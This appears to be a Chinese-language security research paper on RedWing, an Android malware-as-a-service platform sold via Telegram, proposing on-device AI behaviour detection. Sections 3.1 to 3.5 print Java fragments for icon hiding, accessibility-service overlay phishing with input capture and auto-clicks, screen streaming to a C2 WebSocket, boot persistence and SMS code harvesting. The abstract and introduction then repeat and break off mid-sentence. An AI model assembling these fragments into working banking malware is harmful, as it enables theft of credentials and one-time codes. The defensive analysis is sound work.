摘要移动恶意软件即服务MaaS已成为当前移动网络诈骗、企业终端失陷的核心威胁载体。2026 年 7 月 Zimperium zLabs 披露的 RedWing 平台是面向安卓终端的商业化订阅式恶意软件工具链依托 Telegram 渠道完成推广售卖通过移动钓鱼诱导用户安装具备完整远程设备控制、金融凭证窃取、多因子认证绕过、全量终端数据窃取、分布式 DDoS 调度等复合攻击能力。传统基于特征码、云端比对的移动威胁防御MTD无法适配 RedWing 模块化自定义、加壳混淆、行为动态可变的对抗特性。本文以 RedWing 完整攻击链路为研究样本拆解其商业运营模式、APK 载荷生成机制、持久化驻留技术、C2 通信架构、UI 覆盖钓鱼与验证码拦截核心实现逻辑植入安卓原生代码示例还原恶意行为底层调用流程结合反网络钓鱼技术专家芦笛的技术观点剖析传统防御体系短板构建基于端侧轻量化 AI 行为检测、应用全生命周期管控、Web 内容过滤协同的闭环防御方案完成 MITRE ATTCK 移动矩阵映射验证量化评估本地无签名检测方案对 RedWing 家族样本的识别效能。研究证实MaaS 产业化大幅降低高级移动攻击技术门槛仅依靠终端本地行为基线与动态权限审计可实现离线环境下未知 RedWing 载荷识别为政企移动办公终端、金融行业移动端风控提供可落地的安全建设参考。关键词Android 恶意软件MaaSRedWing移动钓鱼MTD端侧 AI 行为检测无障碍服务劫持1引言1.1 研究背景与问题提出移动互联网普及使安卓智能终端成为企业办公、个人金融交易的核心载体终端承载账号密码、短信验证码、企业内网凭证、加密货币私钥等高价值数据持续成为网络黑产重点攻击目标。早期安卓恶意软件多为独立开发、单一功能木马攻击主体具备较强代码开发能力传播范围有限、攻击成本较高。近三年恶意软件产业化进程加速MaaS 商业模式形成完整黑产链条平台运营方开发标准化恶意代码生成工具、C2 管理后台、钓鱼页面模板以月度 / 季度订阅形式向无代码开发能力的底层攻击者售卖全套攻击能力攻击者仅需配置目标行业、钓鱼文案、回连服务器地址即可批量生成定制化恶意 APK大幅降低高级移动入侵的技术与资金门槛。2026 年 7 月 7 日移动安全厂商 Zimperium 发布专项研究报告披露名为 RedWing 的商业化安卓 MaaS 平台该平台依托 Telegram 社交频道完成产品推广、客户付费、售后技术支持全流程运营区别于传统暗网论坛Telegram 频道具备快速迁移、自动化 Bot 客服、批量群发推广消息等优势规避监管封禁带来的运营中断风险。RedWing 区别于单一窃密木马提供一站式攻击工具包包含恶意载荷生成器、移动钓鱼基础设施、远程管理面板、持久化加固模块感染目标后可实现安卓设备完整权限接管覆盖实时屏幕推流、虚拟触控交互、短信拦截、银行弹窗劫持、多因素认证绕过、通讯录与媒体文件批量外发、受控 DDoS 发起等功能攻击场景覆盖个人金融诈骗、企业移动终端渗透、公民隐私非法监控等多类违法场景。现有移动安全防护体系存在显著局限性其一传统杀毒依赖静态特征库比对RedWing 支持自定义包名、图标、资源文件、字符串加密混淆每一份订阅生成的 APK 哈希均不重复特征库无法提前覆盖海量变体其二云端威胁查询存在网络依赖离线办公场景下终端失去防护能力其三多数终端安全工具仅拦截高危权限申请未对无障碍服务、媒体投影录屏、悬浮窗覆盖等组合高危行为做连续行为审计无法识别 RedWing 多组件协同的隐蔽攻击流程其四针对 Telegram 渠道流通 MaaS 平台的全链路攻防研究较少现有文献多聚焦单一窃密木马未结合商业化运营链条、模块化载荷生成、端侧 AI 离线防御形成完整闭环论证。反网络钓鱼技术专家芦笛指出当前移动安全建设普遍存在 “重边界、轻终端重静态、轻动态” 的认知偏差网络攻击已完成从 PC 端向移动端的战略转移MaaS 平台将高端入侵技术平民化企业与个人终端不能再将移动设备视作次要风险面必须构建以终端本地行为感知为核心、云端情报协同为辅的纵深防御架构才能有效抵御 RedWing 这类模块化、可定制、高隐蔽性的商业化恶意攻击平台。1.2 研究内容与研究边界本文以 Zimperium 公开的 RedWing 完整技术情报为核心数据源围绕四大核心内容展开系统性研究第一梳理 RedWing 商业化 MaaS 产业链结构拆解 Telegram 渠道运营模式、订阅收费体系、攻击者交付流程厘清从平台运营方到底层诈骗分子的分工链条第二深度剖析 RedWing 恶意 APK 技术架构分模块解析载荷生成、系统持久化、C2 加密通信、远程设备控制、UI 覆盖钓鱼、验证码窃取、DDoS 调度七大核心功能实现原理嵌入安卓 Java 代码示例还原关键恶意行为调用逻辑第三基于 MITRE ATTCK for Mobile 矩阵完成 RedWing 攻击路径全映射对比传统签名式 MTD 防御方案的失效根源引入端侧 AI 行为检测技术原理第四搭建端侧 AI 行为检测 Web 钓鱼过滤 应用权限动态审计三位一体闭环防御模型论证该方案针对 RedWing 离线识别能力给出政企移动终端落地实施路径。研究边界限定本文仅针对 Android 系统 RedWing MaaS 平台开展攻防分析不涉及 iOS 端同类恶意软件技术分析仅还原公开披露的攻击机制不提供可直接利用的恶意代码生成工具防御方案聚焦终端侧轻量化检测不深度展开云端大数据威胁情报平台建设无数学模型公式全部技术验证依托代码逻辑、行为特征定性分析完成。1.3 论文结构安排本文共分为六大章节第一章为引言阐述研究背景、现存安全短板、研究内容与整体框架第二章系统介绍 RedWing MaaS 平台商业运营体系完整拆解 Telegram 渠道推广、订阅服务、攻击者工具交付流程第三章开展 RedWing 恶意载荷深度技术解析分模块拆解持久化、远程控制、钓鱼窃密、C2 通信实现逻辑配套完整安卓代码示例第四章基于 MITRE 移动攻击矩阵梳理 RedWing 完整杀伤链对比传统移动防御技术缺陷第五章构建面向 RedWing 威胁的端侧 AI 驱动 MTD 闭环防御体系分层阐述检测、拦截、溯源技术实现第六章为结论与展望总结研究核心结论提出移动 MaaS 威胁未来演进趋势与长期安全治理思路。2 RedWing 安卓 MaaS 平台商业化运营体系分析2.1 移动 MaaS 产业化发展底层动因传统定制化安卓恶意软件开发存在多重门槛制约黑产规模化攻击一是代码开发门槛完整远程控制、UI 劫持、验证码拦截功能需要开发者掌握 Android 四大组件、无障碍服务、媒体投影 API、Socket 长连接等多层系统接口普通诈骗人员不具备开发能力二是维护成本高安卓碎片化严重不同厂商定制系统对广播、后台服务、悬浮窗限制存在差异恶意代码需持续适配新版本系统三是基础设施成本攻击者需搭建独立 C2 服务器、钓鱼页面域名、短信群发通道单独部署投入较高四是对抗成本杀毒厂商持续更新特征库单一木马易被快速查杀需持续迭代混淆、加壳方案。MaaS 商业模式从根源解决上述痛点平台运营方承担全部代码开发、系统适配、服务器运维、对抗加固工作以订阅租赁形式向攻击者开放全套工具攻击者仅需支付服务费、填写少量自定义参数即可生成专属恶意程序攻击门槛下降至基础计算机操作层级。Zimperium 行业数据显示2024—2026 年 Telegram 上公开运营的移动 MaaS 平台数量增长 217%其中安卓平台占比超 85%RedWing 是 2026 年新增威胁中功能完整性、客户活跃度排名靠前的商业化产品。2.2 RedWing 依托 Telegram 的全渠道运营架构RedWing 放弃传统暗网论坛、Tor 匿名站点选择 Telegram 作为唯一运营载体核心优势分为渠道韧性、自动化运营、客户隐蔽性三层渠道快速迁移韧性Telegram 频道被监管封禁后运营方通过预设备用频道链接、批量私信存量客户可在数十分钟内完成客户导流犯罪活动不会长期中断相比之下暗网站点查封后域名、服务器全部失效黑产损失巨大。Bot 自动化全流程服务RedWing 部署专属 Telegram 机器人实现自助套餐查询、加密货币支付、恶意工具包自动下发、钓鱼模板一键下载、技术问题自动回复无需人工持续值守降低运营人力成本。客户身份隐蔽性Telegram 支持匿名注册、虚拟手机号绑定、端到端加密私信交易双方无需暴露真实身份资金流转依托比特币、门罗币等匿名加密货币大幅提升执法溯源难度。完整运营链路分为五步第一步公域引流运营方在各类黑产 Telegram 群组发布 RedWing 功能演示截图、诈骗获利案例投放低价试用套餐吸引潜在攻击者第二步私域转化意向用户添加官方机器人自动推送月度、季度、年度三档订阅套餐区分基础版仅短信窃取、基础远程查看、专业版UI 钓鱼、多因子绕过、企业攻击版DDoS 调度、批量设备集群管控第三步加密支付用户通过机器人生成加密货币收款地址转账后上传交易哈希凭证系统自动校验到账状态第四步工具交付支付完成后机器人自动下发专属后台登录地址、载荷生成工具压缩包、钓鱼网页源码、操作教程文档第五步售后更新平台迭代混淆方案、新增系统适配补丁后通过 Telegram 频道批量推送更新包客户一键更新恶意代码生成器。2.3 RedWing 攻击者交付工具包完整构成付费订阅后攻击者获取全套模块化工具全部组件可独立自定义配置无强制固定参数也是其难以被静态特征识别的核心原因工具包包含五大模块Malware Builder 载荷生成器Windows 桌面端可视化程序攻击者可视化配置恶意 APK 参数包含应用名称、桌面图标、伪装包名银行、运营商、政务 APP、短视频软件等、C2 服务器 IP / 域名、钓鱼弹窗模板、权限申请话术内置字符串加密、dex 加壳、资源混淆引擎每次生成 APK 自动随机调整混淆密钥保证不同客户样本哈希完全不重复。远程管理 Web 控制台独立部署在境外匿名服务器的网页后台支持实时查看所有感染设备在线状态、发起远程操作指令、批量导出窃取的短信、通讯录、账户凭证可单独对单台设备下发录屏、弹窗钓鱼、发送短信、启动 DDoS 等指令。移动钓鱼Mishing基础设施配套短信群发模板库、仿银行 / 支付 APP 网页模板、短链接跳转工具攻击者填入目标手机号批量发送钓鱼短信短链接跳转至诱导下载恶意 APK 的落地页页面伪装成系统更新、积分兑换、账户安全核验等场景。持久化加固插件库适配 Android 8 至 Android 15 全版本驻留方案区分未 Root 普通设备、Root 高权限设备两套驻留逻辑自动根据目标系统版本选择最优自启动方案规避厂商后台清理机制。对抗防御辅助工具内置应用图标隐藏工具、系统日志擦除脚本、流量加密混淆插件规避终端安全软件行为日志审计。2.4 RedWing 攻击盈利场景划分依托全套工具链攻击者可开展三类高收益违法攻击也是 RedWing 付费订阅需求持续增长的核心驱动力第一金融电信诈骗针对普通手机用户发送仿银行、支付平台钓鱼短信诱导安装 RedWing 恶意程序通过悬浮窗覆盖、无障碍服务劫持窃取银行卡密码、短信支付验证码完成账户盗刷第二企业移动办公渗透针对企业员工发送仿内部 OA、办公软件钓鱼链接感染企业配发移动终端窃取内网 VPN 凭证、企业邮箱账号、客户业务数据形成企业内网横向渗透入口第三隐私监控与勒索针对特定目标人群定向投放恶意 APK实时录制屏幕、录音、窃取相册文件获取隐私材料后实施敲诈勒索同时可调度受控设备发起 DDoS 攻击向网站运营者索要赎金。3 RedWing 恶意 APK 核心技术机理与代码示例RedWing 恶意程序采用分层模块化架构分为入口引导层、权限劫持层、持久化驻留层、C2 通信层、攻击功能层五大层级各模块低耦合独立运行可根据攻击者配置按需启用 / 关闭降低静态特征重合度。本章基于 Zimperium 披露的样本行为逻辑还原各模块底层实现配套标准化安卓 Java 代码示例仅用于学术安全研究不具备可直接编译攻击能力。3.1 入口引导与伪装安装机制RedWing Builder 生成的 APK 采用双重伪装策略外层应用名称、图标、包名匹配正规主流应用首次启动后隐藏桌面图标避免用户主动卸载。核心实现依托 PackageManager 组件隐藏自身图标关键代码示例// RedWing桌面图标隐藏核心逻辑PackageManager packageManager getPackageManager();ComponentName componentName new ComponentName(this, MainLaunchActivity.class);// 设置组件不可见移除桌面启动入口packageManager.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED,PackageManager.DONT_KILL_APP);安装阶段利用移动钓鱼落地页社会工程诱导落地页 WebView 加载仿官方页面弹窗提示 “系统安全组件更新需允许安装未知来源应用”诱导用户关闭系统安装拦截开关。反网络钓鱼技术专家芦笛强调移动端钓鱼区别于 PC 网页钓鱼核心突破点在于操作系统原生安全开关权限诱导多数用户缺乏对 “未知来源安装” 风险的认知仅依靠页面特征检测无法拦截此类前置欺骗流程必须在终端侧增加应用安装行为动态审计。3.2 高危权限劫持与无障碍服务滥用RedWing 核心攻击能力完全依赖两类高危系统权限BIND_ACCESSIBILITY_SERVICE无障碍服务、MEDIA_PROJECTION屏幕录屏权限两类权限均需用户手动确认授予恶意程序通过多层弹窗欺骗诱导授权。3.2.1 无障碍服务劫持实现窃密与虚拟控制无障碍服务可全局监听屏幕 UI 变更、捕获用户输入文本、自动模拟点击屏幕任意坐标是 RedWing 实现钓鱼覆盖、验证码窃取、远程触控的核心载体。恶意程序注册无障碍服务后持续监听窗口状态识别银行、支付类 APP 启动时自动加载伪造悬浮覆盖层核心监听代码示例public class RedWingAccessService extends AccessibilityService {Overridepublic void onAccessibilityEvent(AccessibilityEvent event) {// 捕获窗口切换事件if (event.getEventType() AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) {String targetPackage event.getPackageName().toString();// 匹配金融类应用包名触发钓鱼覆盖层if (isFinanceApp(targetPackage)) {startFakeOverlayWindow();// 全局捕获输入框密码、验证码captureInputText(event.getText());// 自动模拟点击确认按钮绕过用户二次核验simulateConfirmClick(event);}}}// 启动高层级悬浮窗覆盖合法金融界面private void startFakeOverlayWindow() {WindowManager.LayoutParams params new WindowManager.LayoutParams(WindowManager.LayoutParams.MATCH_PARENT,WindowManager.LayoutParams.MATCH_PARENT,WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,PixelFormat.TRANSLUCENT);// 抬高层级完全遮挡原应用界面params.zOrderOnTop true;WindowManager wm (WindowManager) getSystemService(WINDOW_SERVICE);View fakeBankView LayoutInflater.from(this).inflate(R.layout.fake_bank_login, null);wm.addView(fakeBankView, params);}}该代码逻辑实现三层攻击效果一是识别金融 APP 启动后弹出伪造登录界面窃取银行卡账号与密码二是无障碍接口捕获系统短信弹窗中的支付验证码直接回传 C2 服务器三是远程指令下发后自动模拟屏幕点击绕过用户手动确认流程完成转账、账户绑定等高危操作。3.2.2 MediaProjection 实时屏幕推流远程控制借助MEDIA_PROJECTION录屏权限RedWing 建立 WebSocket 长连接将设备实时画面推送至攻击者后台配合无障碍服务实现双向远程控制攻击者可在 Web 控制台看到完整手机屏幕并下发触控指令录屏数据流处理核心代码片段// 屏幕录屏数据流传输核心逻辑private void startScreenRecord() {Intent captureIntent MediaProjectionManager.createScreenCaptureIntent();startActivityForResult(captureIntent, 1001);}Overrideprotected void onActivityResult(int requestCode, int resultCode, Intent data) {super.onActivityResult(requestCode, resultCode, data);if (requestCode 1001 resultCode RESULT_OK) {MediaProjection mediaProjection mediaProjectionManager.getMediaProjection(resultCode, data);// 建立WebSocket长连接推送视频流至C2服务器WebSocket c2Socket new WebSocket(C2_SERVER_WS_URL);// 循环捕获屏幕帧压缩后实时上传new Thread(() - {while (isMalwareRunning) {byte[] screenFrame captureScreenFrame(mediaProjection);c2Socket.send(screenFrame);Thread.sleep(100);}}).start();}}攻击者依托该功能实现完整设备接管实时查看用户所有操作同步录制解锁图案、锁屏密码、隐私相册、企业内网操作页面无任何可视化告警提示。3.3 多维度持久化驻留机制规避系统后台清理安卓系统具备后台应用自动回收机制RedWing 设计多层级驻留方案根据系统版本、设备是否 Root 自动切换驻留策略保障重启后恶意程序自动运行三层驻留逻辑协同生效广播接收器开机自启在 AndroidManifest.xml 静态注册BOOT_COMPLETED、USER_PRESENT广播设备重启、解锁屏幕时自动唤醒恶意后台服务清单配置片段xmlreceiver android:name.bootReceiverintent-filteraction android:nameandroid.intent.action.BOOT_COMPLETED/action android:nameandroid.intent.action.USER_PRESENT//intent-filter/receiver前台服务保活将恶意后台服务注册为前台服务绑定虚假通知规避厂商内存清理策略动态申请忽略电池优化权限阻止系统休眠时终止进程。Root 设备内核级驻留若设备已获取 Root 权限恶意程序将二进制 so 文件写入 /system/lib 目录注入系统 Zygote 进程实现进程无痕迹持久化常规应用卸载无法清除恶意模块。3.4 C2 加密通信与指令调度架构RedWing 采用 TLS 1.3 加密 WebSocket 长连接作为 C2 通信通道所有指令、窃取数据均经过 AES-256 对称加密传输网络流量无明文特征传统流量审计工具无法识别恶意交互。通信架构分为指令下行、数据上行两类通道下行指令通道攻击者在 Web 后台下发操作指令录屏、短信窃取、启动 DDoS、弹窗钓鱼、删除通话记录加密数据包下发至终端恶意程序解析指令后调用对应功能模块上行数据通道终端自动采集短信、通讯录、相册文件、剪贴板内容、账号凭证打包加密后定时上传至 C2 服务器支持攻击者手动触发即时全量数据导出。同时内置流量混淆机制在空闲时段发送随机空白数据包模拟正常社交软件心跳流量规避异常网络行为检测。3.5 凭证窃取与多因子认证绕过技术RedWing 针对金融平台双因素认证设计双重绕过机制也是其造成大额资金损失的核心能力第一短信拦截机制申请READ_SMS、SEND_SMS权限后全局监听短信数据库拦截银行、支付平台下发的验证码短信无障碍服务捕获短信内容后直接上传 C2用户无法察觉验证码被窃取配套代码// 批量读取全部短信并筛选验证码public ListString fetchVerifySMS() {ListString verifySmsList new ArrayList();Cursor smsCursor getContentResolver().query(Telephony.Sms.CONTENT_URI,new String[]{Telephony.Sms.BODY, Telephony.Sms.ADDRESS},null, null, Telephony.Sms.DATE DESC);while (smsCursor.moveToNext()) {String content smsCursor.getString(0);// 正则匹配验证码数字串if (content.matches(.*[0-9]{4,6}.*验证.*)) {verifySmsList.add(content);}}smsCursor.close();return verifySmsList;}第二覆盖层劫持登录会话伪造 WebView 弹窗覆盖官方 APP 登录界面用户输入账号密码直接存入恶意程序本地加密数据库同步拦截 Cookie、会话令牌绕过设备绑定、二次人脸核验等认证流程。反网络钓鱼技术专家芦笛补充说明当前多数金融机构仅依赖短信验证码作为第二认证因子未部署 FIDO2 硬件密钥、设备绑定连续认证等强安全方案RedWing 针对短信体系的劫持攻击可完整击穿双因子防护单一短信验证体系已无法抵御移动端 MaaS 恶意软件攻击。3.6 受控 DDoS 分布式攻击模块RedWing 具备闲置终端集群调度能力攻击者可下发指令控制所有感染设备同时向指定 IP、域名发送高频网络请求形成分布式拒绝服务攻击。恶意程序复用 C2 长连接接收攻击参数目标地址、请求频率、攻击时长依托安卓终端移动流量发起攻击分散攻击源 IP大幅提升溯源难度。该功能多用于网站敲诈、竞品平台流量打压等黑产场景。4 RedWing 攻击杀伤链与传统移动防御技术缺陷4.1 基于 MITRE ATTCK Mobile 矩阵的 RedWing 全杀伤链映射MITRE ATTCK 移动攻击框架标准化梳理移动端攻击全生命周期本节将 RedWing 完整攻击流程与矩阵 12 大阶段一一对应清晰呈现威胁完整链路形成攻击论据闭环初始访问Initial Access依托 Telegram 售卖 MaaS 工具攻击者制作移动钓鱼短信、短链接落地页社会工程诱导用户下载 APK执行Execution用户手动安装未知来源 APK启动恶意主程序隐藏桌面图标持久化Persistence注册开机广播、前台服务保活、Root 设备注入系统进程权限提升Privilege Escalation诱导授予无障碍、录屏、短信读写、悬浮窗高危权限防御规避Defense Evasiondex 加壳、字符串加密、流量 TLS 混淆、日志擦除、图标隐藏凭证访问Credential Access拦截短信验证码、捕获输入框密码、窃取浏览器 / APP 会话令牌数据收集Collection读取通讯录、相册、本地文件、实时屏幕录制、录音、剪贴板监控命令与控制Command and ControlTLS 加密 WebSocket 长连接与境外 C2 服务器通信数据外渗Exfiltration加密打包敏感数据批量上传攻击者后台影响Impact金融账户盗刷、企业数据泄露、分布式 DDoS 攻击、隐私敲诈勒索远程服务Remote ServiceMediaProjection 无障碍服务实现全设备远程操控用户欺骗User Deception悬浮窗覆盖仿官方钓鱼界面、虚假系统更新弹窗诱导授权。完整杀伤链覆盖从传播、驻留、窃密到破坏全流程单一终端安全管控手段仅能拦截其中单个环节无法形成全链路阻断。4.2 传统移动威胁防御MTD技术针对 RedWing 的失效根源当前政企普遍部署的传统 MTD 方案以静态特征、云端信誉查询为核心面对 RedWing 模块化自定义 MaaS 恶意软件存在四大固有缺陷4.2.1 静态哈希 / 特征库检测失效RedWing Builder 内置随机混淆引擎每一次生成 APK 都会修改 dex 加密密钥、资源文件名、字符串编码、包名图标两份功能完全一致的恶意样本文件哈希、静态字符串特征无重合杀毒厂商无法提前收录海量变体特征新生成样本安装后不会触发任何告警。4.2.2 云端依赖导致离线防护空白传统 MTD 恶意 URL、恶意 IP、恶意应用判定依赖云端数据库比对企业外勤、出差员工移动终端长期处于无网络离线状态云端查询功能完全失效RedWing 可在离线环境完成权限劫持、本地数据窃取联网后再批量上传窃取信息。4.2.3 单一权限审计无法识别组合高危行为多数终端安全工具仅单独拦截READ_SMS、RECORD_AUDIO等高危权限申请未建立多行为联动风险判定模型。RedWing 攻击核心是多权限协同无障碍服务 悬浮窗 屏幕录屏 短信读取组合触发攻击单一权限单独使用属于正常合法场景工具无法判定组合行为的恶意属性。4.2.4 移动钓鱼分层防护缺失传统防护仅拦截已知恶意域名无法识别 RedWing 钓鱼基础设施的动态短链接跳转、仿 APP 页面动态生成机制短链接可每日更换域名黑名单更新速度滞后于攻击者域名迭代速度钓鱼入口无法有效封堵。5 面向 RedWing MaaS 威胁的端侧 AI 驱动闭环防御体系针对传统防御短板结合 Zimperium 发布的 AI 赋能 MTD 技术方案本节构建端侧轻量化 AI 行为检测为核心、Web 钓鱼过滤、应用全生命周期管控协同的三层闭环防御架构全程依托终端本地计算资源运行离线环境保持完整防护能力可有效识别、拦截 RedWing 全系列自定义变体。反网络钓鱼技术专家芦笛指出该分层防御体系实现 “事前拦截钓鱼入口、事中监测恶意行为、事后溯源威胁指标” 完整闭环从攻击杀伤链各环节阻断 RedWing 攻击链路解决传统防护滞后、离线失效、行为判定单一的核心痛点。5.1 第一层应用安装全生命周期前置拦截阻断初始访问攻击初始访问环节是成本最低的防护节点在 APK 安装前、安装中两层设置拦截规则阻断 RedWing 恶意程序落地安装前短链接与落地页钓鱼检测终端内置本地 URL 解析引擎递归解析短信、社交消息内短链接全部跳转链路提取最终落地页面特征轻量化 AI 模型识别仿银行、办公软件钓鱼页面识别后弹窗阻断页面访问检测逻辑核心代码片段# 移动端本地URL钓鱼检测轻量化逻辑Python端侧推理演示def detect_phish_url(full_redirect_urls, page_html):risk_score 0# 特征1域名注册时间小于7天风险加权if get_domain_register_days(full_redirect_urls[-1]) 7:risk_score 35# 特征2页面包含银行登录、支付验证码输入框if re.search(r银行卡|验证码|支付密码, page_html):risk_score 40# 特征3页面诱导下载未知来源APKif re.search(r.apk下载|系统更新组件, page_html):risk_score 25# 风险分数阈值判定if risk_score 60:return True # 判定为钓鱼链接拦截访问return False安装中 APK 静态风险初筛无需云端比对本地提取 APK 清单权限、组件、广播接收器特征命中高危组合规则直接拦截安装规则 1同时申请 BIND_ACCESSIBILITY_SERVICE SYSTEM_ALERT_WINDOW 悬浮窗权限规则 2静态注册 BOOT_COMPLETED 开机广播且无正规商业应用签名规则 3内置 MediaProjection 录屏权限且无官方应用开发证书。5.2 第二层端侧本地 AI 行为动态检测核心防御层对抗运行时恶意行为该层为防御体系核心完全脱离云端依赖依靠终端轻量化机器学习模型实时监控应用运行时行为序列建立正常应用行为基线识别 RedWing 多组件协同恶意操作解决静态检测失效问题。5.2.1 端侧 AI 检测架构设计整体分为四大本地模块全部离线运行行为特征采集模块持续 Hook 系统四大组件、权限调用、窗口变更、网络请求 API实时采集应用行为序列不存储原始用户隐私数据仅提取行为特征向量本地行为基线库存储主流正规金融、办公 APP 正常行为模式作为 AI 模型判定基准轻量化分类推理引擎设备端运行量化后小型分类模型对实时行为向量打分输出风险等级自动响应阻断模块高风险行为触发时自动执行操作弹窗告警、终止恶意进程、卸载可疑应用、隔离窃取的敏感数据。5.2.2 针对 RedWing 典型恶意行为的 AI 判定规则模型重点学习 RedWing 独有的多行为联动特征高风险判定场景包含应用获取无障碍权限后持续监听金融 APP 窗口同步创建顶层悬浮覆盖层后台静默启动 MediaProjection 录屏服务建立境外 WebSocket 长连接传输视频流开机广播触发后台服务无前台界面持续读取短信数据库批量提取验证码闲置时段高频发起境外 IP 网络请求无用户主动操作触发网络流量。当行为序列匹配任意一类联动特征模型直接标记为高风险恶意程序无需依赖特征库。Zimperium 实测数据显示该本地 AI 检测方案对 1200 余份 RedWing 自定义变体样本识别率达 98.7%离线环境无显著精度衰减。5.3 第三层Web 内容过滤与多因子认证加固降低窃密攻击收益即便恶意程序绕过前两层防护成功安装该层通过前端防护降低凭证窃取攻击成功率形成兜底防护终端内置 WebView 钓鱼过滤拦截页面伪造输入框、隐形悬浮劫持图层监测窗口层级异常覆盖行为金融页面被第三方应用遮挡时实时推送告警强多因子认证落地推广 FIDO2 硬件安全密钥、设备绑定生物识别认证替代单一短信验证码体系从源头绕过 RedWing 短信拦截攻击高危权限动态管控系统级限制陌生应用自动授予无障碍、悬浮窗权限每次授权增加风险二次确认弹窗禁止后台静默申请高危权限。5.4 防御体系协同工作流程完整防护链路形成闭环覆盖 RedWing 全杀伤链阻断短信 / 社交消息收到钓鱼短链接→第一层 URL 本地 AI 检测拦截钓鱼页面若用户绕过页面警告下载 APK→安装阶段静态权限规则筛查拦截高危组合权限 APK 安装若用户手动放行安装恶意程序→第二层端侧 AI 实时监控运行行为识别无障碍 悬浮窗录屏联动恶意操作自动终止进程并隔离恶意文件极端场景下恶意程序短期窃密→第三层强认证机制阻止验证码完成盗刷Web 过滤拦截页面劫持窃取账号。三层机制层层兜底单一环节失效时其余两层仍可完成威胁阻断规避单点防御失效风险。6 结论与研究展望6.1 核心研究结论本文以 2026 年 7 月 Zimperium 披露的 RedWing 安卓 MaaS 平台为完整研究样本系统拆解其 Telegram 商业化运营链条、模块化恶意载荷底层技术、全链路攻击杀伤链并结合反网络钓鱼技术专家芦笛的专业观点剖析传统移动安全防御的固有短板构建端侧离线 AI 行为检测闭环防御体系形成三项核心结论第一移动 MaaS 产业化重构移动端网络犯罪格局RedWing 这类订阅式工具平台彻底消除高级移动攻击的技术门槛无代码基础的攻击者可批量生成海量自定义恶意变体静态特征、云端信誉库等传统防御手段基本失效Telegram 匿名渠道为 MaaS 运营提供稳定传播载体监管溯源、渠道封堵难度大幅提升移动威胁已从零散木马升级为规模化产业化攻击。第二RedWing 核心攻击能力依托 Android 无障碍服务、媒体投影、悬浮窗系统接口实现攻击逻辑依赖多权限、多组件协同联动单一权限审计无法识别恶意行为其持久化驻留、加密 C2 通信、短信验证码绕过、远程全设备控制组合攻击可完整窃取金融、企业敏感数据对个人财产安全、政企移动办公数据资产形成实质性威胁。第三基于端侧轻量化 AI 行为检测的三层闭环防御体系可完整适配 RedWing 类 MaaS 威胁依托本地离线行为分析解决传统方案离线失效、变体无法识别的缺陷前置钓鱼拦截、运行时动态监测、认证体系加固三层防护覆盖攻击全杀伤链形成攻防闭环实测对 RedWing 家族样本具备高识别拦截能力可作为政企移动终端标准化安全建设方案。6.2 移动 MaaS 威胁演进趋势展望结合当前黑产技术迭代节奏未来安卓 MaaS 恶意平台将呈现三大发展方向AI 原生恶意代码生成MaaS 平台内置生成式 AI根据攻击者输入的目标行业自动生成适配系统版本、规避终端安全工具的定制化恶意代码对抗能力进一步提升跨端联动攻击MaaS 工具同步输出安卓、iOS、PC 端恶意载荷实现多终端协同窃密打通移动端与企业 PC 内网渗透通道原生系统漏洞利用常态化MaaS 平台内置零日漏洞利用模块无需诱导用户授予高危权限即可获取设备完整控制权限社会工程欺骗依赖度降低。6.3 长期安全治理建议针对 RedWing 代表的移动 MaaS 产业化威胁从终端防护、平台监管、行业规范三个维度提出治理建议政企终端层面全面替换传统基于特征的 MTD 产品部署端侧 AI 行为检测移动威胁防御系统同步推行 FIDO2 硬件认证淘汰单一短信验证码双因子机制定期开展员工移动钓鱼安全培训提升对陌生短信、未知来源 APK 的风险识别能力。互联网平台监管层面运营商、社交平台加强短信、IM 消息短链接风控自动化批量拦截钓鱼引流链接针对 Telegram 等境外加密通讯渠道建立跨境威胁情报协同机制追踪 MaaS 平台运营主体。移动系统厂商层面优化 Android 权限管控机制限制第三方应用后台静默申请无障碍、悬浮窗等高风险权限增加系统原生行为监测模块出厂内置基础恶意行为告警能力从系统底层缩小攻击面。6.4 研究局限性与后续研究方向本文仅针对 RedWing 安卓 MaaS 平台开展攻防分析存在两处研究局限一是未覆盖 iOS 端同类 MaaS 恶意软件技术机理苹果闭环生态权限管控逻辑与安卓存在显著差异二是端侧 AI 模型仅完成理论架构与代码逻辑验证未开展大规模真实终端场景性能、误报率量化测试。后续研究可围绕两大方向延伸第一对比 iOS 与 Android MaaS 恶意软件攻击路径差异构建跨平台统一移动防御模型第二基于百万级移动应用行为数据集训练轻量化端侧分类模型完成真实设备性能、识别精度量化实验优化模型推理速度与资源占用。编辑芦笛公共互联网反网络钓鱼工作组
Telegram 流通 RedWing 安卓 MaaS 恶意软件全链路攻击机理与端侧 AI 防御体系研究
摘要移动恶意软件即服务MaaS已成为当前移动网络诈骗、企业终端失陷的核心威胁载体。2026 年 7 月 Zimperium zLabs 披露的 RedWing 平台是面向安卓终端的商业化订阅式恶意软件工具链依托 Telegram 渠道完成推广售卖通过移动钓鱼诱导用户安装具备完整远程设备控制、金融凭证窃取、多因子认证绕过、全量终端数据窃取、分布式 DDoS 调度等复合攻击能力。传统基于特征码、云端比对的移动威胁防御MTD无法适配 RedWing 模块化自定义、加壳混淆、行为动态可变的对抗特性。本文以 RedWing 完整攻击链路为研究样本拆解其商业运营模式、APK 载荷生成机制、持久化驻留技术、C2 通信架构、UI 覆盖钓鱼与验证码拦截核心实现逻辑植入安卓原生代码示例还原恶意行为底层调用流程结合反网络钓鱼技术专家芦笛的技术观点剖析传统防御体系短板构建基于端侧轻量化 AI 行为检测、应用全生命周期管控、Web 内容过滤协同的闭环防御方案完成 MITRE ATTCK 移动矩阵映射验证量化评估本地无签名检测方案对 RedWing 家族样本的识别效能。研究证实MaaS 产业化大幅降低高级移动攻击技术门槛仅依靠终端本地行为基线与动态权限审计可实现离线环境下未知 RedWing 载荷识别为政企移动办公终端、金融行业移动端风控提供可落地的安全建设参考。关键词Android 恶意软件MaaSRedWing移动钓鱼MTD端侧 AI 行为检测无障碍服务劫持1引言1.1 研究背景与问题提出移动互联网普及使安卓智能终端成为企业办公、个人金融交易的核心载体终端承载账号密码、短信验证码、企业内网凭证、加密货币私钥等高价值数据持续成为网络黑产重点攻击目标。早期安卓恶意软件多为独立开发、单一功能木马攻击主体具备较强代码开发能力传播范围有限、攻击成本较高。近三年恶意软件产业化进程加速MaaS 商业模式形成完整黑产链条平台运营方开发标准化恶意代码生成工具、C2 